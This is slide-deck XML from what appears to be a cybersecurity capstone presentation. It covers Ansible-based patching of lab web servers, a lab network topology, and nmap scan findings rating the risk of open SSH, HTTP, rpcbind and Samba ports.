              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2651" name="Google Shape;2651;p174"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11556125" y="9824825"/>
            <a:ext cx="97401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Info and screenshot from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/disable-directory-listing-web-servers/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>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id="2652" name="Google Shape;2652;p174"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11556125" y="2535675"/>
            <a:ext cx="11391976" cy="71042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75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21500" y="21500"/>
            <a:ext cx="24377700" cy="137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8" name="Google Shape;2658;p175"/>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59" name="Google Shape;2659;p175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731280" y="5711450"/>
            <a:ext cx="22914900" cy="23697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60" name="Google Shape;2660;p17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7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Implementing Patches with Ansible</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2666" name="Google Shape;2666;p17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67" name="Google Shape;2667;p176"/>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Playbook Overview</a:t>
            </a:r>
            <a:endParaRPr sz="48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Ansible is an open-source software provisioning, configuration management, and application-deployment tool enabling infrastructure as code.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Ansible is especially useful for setting up and maintaining LAMP stack web servers like Target 1 and Target 2 in our virtual network. </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ansible Playbooks can be used to fully automate the set up of new Web Server VMs as well as keeping the individual services (Apache, MySQL, WordPress) patched and up to date. </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77"/>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Network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73" name="Google Shape;2673;p17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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18305825"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800">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Address Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Gateway: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="28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100"/>
              <a:t>IPv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Hostname: Switch</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Hostname: ELK</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>IPv4: 192.168.105</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Hostname: Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2100"/>
              <a:t>IPv4: 192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2100"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2100"/>
              <a:t>Hostname: Target1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4: 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: Target2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="21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2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: Kali</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2379" name="Google Shape;2379;p142"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2380" name="Google Shape;2380;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11785" l="2505" r="0" t="11785"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="988925" y="2427925"/>
            <a:ext cx="17717724" cy="104836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17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680" name="Google Shape;2680;p17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81" name="Google Shape;2681;p17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682" name="Google Shape;2682;p178"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184992" y="38804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Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2683" name="Google Shape;2683;p178"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119808" y="61085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Traffic Profile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2684" name="Google Shape;2684;p178"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="83558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Normal Activity</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2685" name="Google Shape;2685;p178"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119609" y="106030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Malicious Activity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79"/>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Critical Vulnerabilities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91" name="Google Shape;2691;p17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p180"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="245832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697" name="Google Shape;2697;p18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98" name="Google Shape;2698;p180"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="14232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699" name="Google Shape;2699;p180"/>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1786625">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r>
              <a:tr h="2374600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>SSH</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>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3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>open port 22/tcp OpenSSH</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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High - Open SSH ports can allow unauthorized users to login remotely.</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Caveat"/>
                        <a:ea typeface="Caveat"/>
                        <a:cs typeface="Caveat"/>
                        <a:sym typeface="Caveat"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="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426475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>HTTP</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open port 80/tcp Apache httpd 2.4.10</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Medium</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440975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>rcpbind</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>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open port 111/tcp 2-4 (RPC #100000)</a:t>
                      </a:r>
                      <a:endParaRPr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Medium - DDoS attacks</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="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872625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>netbios-ssn</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open port 139/tcp and port 445/tcp Samba smbd 3.X-4.X (workgroup: WORKGROUP)</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Low</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18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nmap scan on Target-1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2706" name="Google Shape;2706;p18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2707" name="Google Shape;2707;p181"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2558325" y="2399475"/>
            <a:ext cx="19155101" cy="10089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18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2</a:t>
